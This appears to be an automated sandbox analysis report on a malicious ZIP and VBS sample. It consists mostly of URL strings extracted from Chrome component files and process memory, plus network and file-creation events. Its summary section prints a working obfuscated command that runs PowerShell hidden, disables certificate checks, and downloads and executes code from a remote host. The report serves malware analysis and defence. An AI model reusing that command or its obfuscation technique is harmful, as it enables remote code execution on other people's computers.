Source: optimization-hints.pb.0.drString found in binary or memory: https://google-wallet-ccr-salvador.pagmob.com.br/pay
Source: sets.json.0.drString found in binary or memory: https://graziadaily.co.uk
Source: sets.json.0.drString found in binary or memory: https://grid.id
Source: sets.json.0.drString found in binary or memory: https://gridgames.app
Source: sets.json.0.drString found in binary or memory: https://growthrx.in
Source: sets.json.0.drString found in binary or memory: https://grupolpg.sv
Source: sets.json.0.drString found in binary or memory: https://gujaratijagran.com
Source: sets.json.0.drString found in binary or memory: https://hapara.com
Source: sets.json.0.drString found in binary or memory: https://hazipatika.com
Source: sets.json.0.drString found in binary or memory: https://hc1.com
Source: sets.json.0.drString found in binary or memory: https://hc1.global
Source: sets.json.0.drString found in binary or memory: https://hc1cas.com
Source: sets.json.0.drString found in binary or memory: https://hc1cas.global
Source: sets.json.0.drString found in binary or memory: https://healthshots.com
Source: sets.json.0.drString found in binary or memory: https://hearty.app
Source: sets.json.0.drString found in binary or memory: https://hearty.gift
Source: sets.json.0.drString found in binary or memory: https://hearty.me
Source: sets.json.0.drString found in binary or memory: https://heartymail.com
Source: sets.json.0.drString found in binary or memory: https://heatworld.com
Source: sets.json.0.drString found in binary or memory: https://helpdesk.com
Source: sets.json.0.drString found in binary or memory: https://hindustantimes.com
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600553863.00000000056E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600197101.0000000005410000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened
Source: wscript.exe, 00000008.00000002.3600197101.0000000005410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedL
Source: wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedW
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedY
Source: wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openede
Source: sets.json.0.drString found in binary or memory: https://hj.rs
Source: sets.json.0.drString found in binary or memory: https://hjck.com
Source: sets.json.0.drString found in binary or memory: https://html-load.cc
Source: sets.json.0.drString found in binary or memory: https://html-load.com
Source: sets.json.0.drString found in binary or memory: https://human-talk.org
Source: sets.json.0.drString found in binary or memory: https://idbs-cloud.com
Source: sets.json.0.drString found in binary or memory: https://idbs-dev.com
Source: sets.json.0.drString found in binary or memory: https://idbs-eworkbook.com
Source: sets.json.0.drString found in binary or memory: https://idbs-staging.com
Source: sets.json.0.drString found in binary or memory: https://img-load.com
Source: sets.json.0.drString found in binary or memory: https://indiatimes.com
Source: sets.json.0.drString found in binary or memory: https://indiatoday.in
Source: sets.json.0.drString found in binary or memory: https://indiatodayne.in
Source: sets.json.0.drString found in binary or memory: https://infoedgeindia.com
Source: sets.json.0.drString found in binary or memory: https://interia.pl
Source: sets.json.0.drString found in binary or memory: https://intoday.in
Source: sets.json.0.drString found in binary or memory: https://iolam.it
Source: sets.json.0.drString found in binary or memory: https://ishares.com
Source: sets.json.0.drString found in binary or memory: https://jagran.com
Source: sets.json.0.drString found in binary or memory: https://johndeere.com
Source: sets.json.0.drString found in binary or memory: https://journaldesfemmes.com
Source: sets.json.0.drString found in binary or memory: https://journaldesfemmes.fr
Source: sets.json.0.drString found in binary or memory: https://journaldunet.com
Source: sets.json.0.drString found in binary or memory: https://journaldunet.fr
Source: sets.json.0.drString found in binary or memory: https://joyreactor.cc
Source: sets.json.0.drString found in binary or memory: https://joyreactor.com
Source: sets.json.0.drString found in binary or memory: https://kaksya.in
Source: sets.json.0.drString found in binary or memory: https://knowledgebase.com
Source: sets.json.0.drString found in binary or memory: https://kompas.com
Source: sets.json.0.drString found in binary or memory: https://kompas.tv
Source: sets.json.0.drString found in binary or memory: https://kompasiana.com
Source: sets.json.0.drString found in binary or memory: https://lanacion.com.ar
Source: sets.json.0.drString found in binary or memory: https://landyrev.com
Source: sets.json.0.drString found in binary or memory: https://landyrev.ru
Source: sets.json.0.drString found in binary or memory: https://laprensagrafica.com
Source: sets.json.0.drString found in binary or memory: https://lateja.cr
Source: sets.json.0.drString found in binary or memory: https://libero.it
Source: sets.json.0.drString found in binary or memory: https://linternaute.com
Source: sets.json.0.drString found in binary or memory: https://linternaute.fr
Source: sets.json.0.drString found in binary or memory: https://livechat.com
Source: sets.json.0.drString found in binary or memory: https://livechatinc.com
Source: sets.json.0.drString found in binary or memory: https://livehindustan.com
Source: sets.json.0.drString found in binary or memory: https://livemint.com
Source: wscript.exe, 00000008.00000002.3600888684.0000000006127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: optimization-hints.pb.0.drString found in binary or memory: https://m.aliexpress.com/p/second-payment/pay-result.html?.
Source: optimization-hints.pb.0.drString found in binary or memory: https://m.americanas.com.br/compra/pix.
Source: sets.json.0.drString found in binary or memory: https://max.auto
Source: sets.json.0.drString found in binary or memory: https://medonet.pl
Source: sets.json.0.drString found in binary or memory: https://meo.pt
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.cl
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.co.cr
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ar
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.bo
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.co
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.do
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ec
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.gt
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.hn
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.mx
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ni
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.pa
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.pe
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.py
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.sv
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.uy
Source: sets.json.0.drString found in binary or memory: https://mercadolibre.com.ve
Source: sets.json.0.drString found in binary or memory: https://mercadolivre.com
Source: sets.json.0.drString found in binary or memory: https://mercadolivre.com.br
Source: sets.json.0.drString found in binary or memory: https://mercadopago.cl
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.ar
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.br
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.co
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.ec
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.mx
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.pe
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.uy
Source: sets.json.0.drString found in binary or memory: https://mercadopago.com.ve
Source: sets.json.0.drString found in binary or memory: https://mercadoshops.cl
Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com
Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.ar
Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.br
Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.co
Source: sets.json.0.drString found in binary or memory: https://mercadoshops.com.mx
Source: sets.json.0.drString found in binary or memory: https://mighty-app.appspot.com
Source: sets.json.0.drString found in binary or memory: https://mightytext.net
Source: sets.json.0.drString found in binary or memory: https://mittanbud.no
Source: sets.json.0.drString found in binary or memory: https://money.pl
Source: sets.json.0.drString found in binary or memory: https://motherandbaby.com
Source: sets.json.0.drString found in binary or memory: https://mystudentdashboard.com
Source: sets.json.0.drString found in binary or memory: https://nacion.com
Source: sets.json.0.drString found in binary or memory: https://naukri.com
Source: sets.json.0.drString found in binary or memory: https://nidhiacademyonline.com
Source: sets.json.0.drString found in binary or memory: https://nien.co
Source: sets.json.0.drString found in binary or memory: https://nien.com
Source: sets.json.0.drString found in binary or memory: https://nien.org
Source: sets.json.0.drString found in binary or memory: https://nlc.hu
Source: sets.json.0.drString found in binary or memory: https://nosalty.hu
Source: sets.json.0.drString found in binary or memory: https://noticiascaracol.com
Source: sets.json.0.drString found in binary or memory: https://nourishingpursuits.com
Source: sets.json.0.drString found in binary or memory: https://nvidia.com
Source: sets.json.0.drString found in binary or memory: https://o2.pl
Source: sets.json.0.drString found in binary or memory: https://ocdn.eu
Source: sets.json.0.drString found in binary or memory: https://onet.pl
Source: sets.json.0.drString found in binary or memory: https://ottplay.com
Source: sets.json.0.drString found in binary or memory: https://p106.net
Source: sets.json.0.drString found in binary or memory: https://p24.hu
Source: sets.json.0.drString found in binary or memory: https://paula.com.uy
Source: sets.json.0.drString found in binary or memory: https://pdmp-apis.no
Source: sets.json.0.drString found in binary or memory: https://phonandroid.com
Source: sets.json.0.drString found in binary or memory: https://player.pl
Source: sets.json.0.drString found in binary or memory: https://plejada.pl
Source: sets.json.0.drString found in binary or memory: https://poalim.site
Source: sets.json.0.drString found in binary or memory: https://poalim.xyz
Source: sets.json.0.drString found in binary or memory: https://pomponik.pl
Source: sets.json.0.drString found in binary or memory: https://portalinmobiliario.com
Source: sets.json.0.drString found in binary or memory: https://prisjakt.no
Source: sets.json.0.drString found in binary or memory: https://pudelek.pl
Source: sets.json.0.drString found in binary or memory: https://punjabijagran.com
Source: sets.json.0.drString found in binary or memory: https://radio1.be
Source: sets.json.0.drString found in binary or memory: https://radio2.be
Source: sets.json.0.drString found in binary or memory: https://reactor.cc
Source: sets.json.0.drString found in binary or memory: https://repid.org
Source: sets.json.0.drString found in binary or memory: https://reshim.org
Source: optimization-hints.pb.0.drString found in binary or memory: https://rsolomakhin.github.io/pix/.
Source: sets.json.0.drString found in binary or memory: https://rws1nvtvt.com
Source: sets.json.0.drString found in binary or memory: https://rws2nvtvt.com
Source: sets.json.0.drString found in binary or memory: https://rws3nvtvt.com
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1839127825.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1839127825.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/XIh
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1839127825.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/sta
Source: wscript.exe, 00000008.00000002.3599216434.00000000030F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stat
Source: wscript.exe, 00000008.00000002.3600197101.0000000005410000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600008767.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stats/0.php?4926118&
Source: sets.json.0.drString found in binary or memory: https://sackrace.ai
Source: optimization-hints.pb.0.drString found in binary or memory: https://sacolamobile.magazineluiza.com.br/#/comprovante
Source: sets.json.0.drString found in binary or memory: https://salemoveadvisor.com
Source: sets.json.0.drString found in binary or memory: https://salemovefinancial.com
Source: sets.json.0.drString found in binary or memory: https://salemovetravel.com
Source: sets.json.0.drString found in binary or memory: https://samayam.com
Source: sets.json.0.drString found in binary or memory: https://sapo.io
Source: sets.json.0.drString found in binary or memory: https://sapo.pt
Source: optimization-hints.pb.0.drString found in binary or memory: https://secure.epocacosmeticos.com.br/checkout/#/payment.
Source: optimization-hints.pb.0.drString found in binary or memory: https://secure.vivara.com.br/checkout?orderFormId=.
Source: sets.json.0.drString found in binary or memory: https://shock.co
Source: optimization-hints.pb.0.drString found in binary or memory: https://shopee.com.br/payment/.
Source: sets.json.0.drString found in binary or memory: https://smaker.pl
Source: sets.json.0.drString found in binary or memory: https://smoney.vn
Source: sets.json.0.drString found in binary or memory: https://smpn106jkt.sch.id
Source: sets.json.0.drString found in binary or memory: https://socket-to-me.vip
Source: sets.json.0.drString found in binary or memory: https://songshare.com
Source: sets.json.0.drString found in binary or memory: https://songstats.com
Source: sets.json.0.drString found in binary or memory: https://sporza.be
Source: sets.json.0.drString found in binary or memory: https://standardsandpraiserepurpose.com
Source: sets.json.0.drString found in binary or memory: https://startlap.hu
Source: sets.json.0.drString found in binary or memory: https://startupislandtaiwan.com
Source: sets.json.0.drString found in binary or memory: https://startupislandtaiwan.net
Source: sets.json.0.drString found in binary or memory: https://startupislandtaiwan.org
Source: sets.json.0.drString found in binary or memory: https://stripe.com
Source: sets.json.0.drString found in binary or memory: https://stripe.network
Source: sets.json.0.drString found in binary or memory: https://stripecdn.com
Source: sets.json.0.drString found in binary or memory: https://supereva.it
Source: sets.json.0.drString found in binary or memory: https://takeabreak.co.uk
Source: sets.json.0.drString found in binary or memory: https://talkdeskqaid.com
Source: sets.json.0.drString found in binary or memory: https://talkdeskstgid.com
Source: sets.json.0.drString found in binary or memory: https://teacherdashboard.com
Source: sets.json.0.drString found in binary or memory: https://technology-revealed.com
Source: sets.json.0.drString found in binary or memory: https://terazgotuje.pl
Source: sets.json.0.drString found in binary or memory: https://text.com
Source: sets.json.0.drString found in binary or memory: https://textyserver.appspot.com
Source: sets.json.0.drString found in binary or memory: https://the42.ie
Source: sets.json.0.drString found in binary or memory: https://thejournal.ie
Source: sets.json.0.drString found in binary or memory: https://thirdspace.org.au
Source: sets.json.0.drString found in binary or memory: https://timesinternet.in
Source: sets.json.0.drString found in binary or memory: https://timesofindia.com
Source: sets.json.0.drString found in binary or memory: https://tolteck.app
Source: sets.json.0.drString found in binary or memory: https://tolteck.com
Source: sets.json.0.drString found in binary or memory: https://top.pl
Source: sets.json.0.drString found in binary or memory: https://tribunnews.com
Source: sets.json.0.drString found in binary or memory: https://trytalkdesk.com
Source: sets.json.0.drString found in binary or memory: https://tucarro.com
Source: sets.json.0.drString found in binary or memory: https://tucarro.com.co
Source: sets.json.0.drString found in binary or memory: https://tucarro.com.ve
Source: sets.json.0.drString found in binary or memory: https://tvid.in
Source: sets.json.0.drString found in binary or memory: https://tvn.pl
Source: sets.json.0.drString found in binary or memory: https://tvn24.pl
Source: sets.json.0.drString found in binary or memory: https://unotv.com
Source: sets.json.0.drString found in binary or memory: https://victorymedium.com
Source: sets.json.0.drString found in binary or memory: https://vrt.be
Source: sets.json.0.drString found in binary or memory: https://vwo.com
Source: sets.json.0.drString found in binary or memory: https://welt.de
Source: sets.json.0.drString found in binary or memory: https://wieistmeineip.de
Source: sets.json.0.drString found in binary or memory: https://wildix.com
Source: sets.json.0.drString found in binary or memory: https://wildixin.com
Source: sets.json.0.drString found in binary or memory: https://wingify.com
Source: sets.json.0.drString found in binary or memory: https://wordle.at
Source: sets.json.0.drString found in binary or memory: https://wp.pl
Source: sets.json.0.drString found in binary or memory: https://wpext.pl
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.amazon.com.br/gp/buy/thankyou/handlers/display.html
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.anacapri.com.br/checkout/order-confirmation/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.arezzo.com.br/checkout/order-confirmation/.
Source: sets.json.0.drString found in binary or memory: https://www.asadcdn.com
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.centauro.com.br/checkouts/confirmacao/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.cobasi.com.br/checkout/review.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.elo7.com.br/buyer/order/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.fastshop.com.br/web/checkout-v2/pagamento/confirmacao.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.hering.com.br/checkout/#/payment
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.hurb.com/br/pay/checkout/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.ifood.com.br/pedidos/aguardando-pagamento/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.madeiramadeira.com.br/carrinho/finalizar-pedido/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.motorola.com.br/checkout/#/payment
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.natura.com.br/pedido-concluido/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.netshoes.com.br/checkout/confirmation/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.paodeacucar.com/checkout.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.petz.com.br/checkout/confirmation/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.riachuelo.com.br/successpage
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.schutz.com.br/checkout/order-confirmation/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.sephora.com.br/checkout/success/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.ultrafarma.com.br/checkout/confirmacao/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.zattini.com.br/checkout/confirmation/.
Source: optimization-hints.pb.0.drString found in binary or memory: https://www.zzmall.com.br/checkout/order-confirmation/.
Source: sets.json.0.drString found in binary or memory: https://ya.ru
Source: sets.json.0.drString found in binary or memory: https://yours.co.uk
Source: sets.json.0.drString found in binary or memory: https://zalo.me
Source: sets.json.0.drString found in binary or memory: https://zdrowietvn.pl
Source: sets.json.0.drString found in binary or memory: https://zingmp3.vn
Source: sets.json.0.drString found in binary or memory: https://zoom.com
Source: sets.json.0.drString found in binary or memory: https://zoom.us
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 56893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 54.39.156.32:443 -> 192.168.2.4:49748 version: TLS 1.2

System Summary

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\CfF7MWq7aG.zip (copy)Jump to dropped file
Source: CfF7MWq7aG.zip.crdownload.0.drZip Entry: 2025010453906.vbs
Source: chromecache_119.2.drZip Entry: 2025010453906.vbs
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dllJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\sets.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\LICENSEJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\LICENSE.txtJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\Filtering RulesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\cr_en-us_500000_index.binJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\optimization-hints.pbJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\manifest.fingerprintJump to behavior
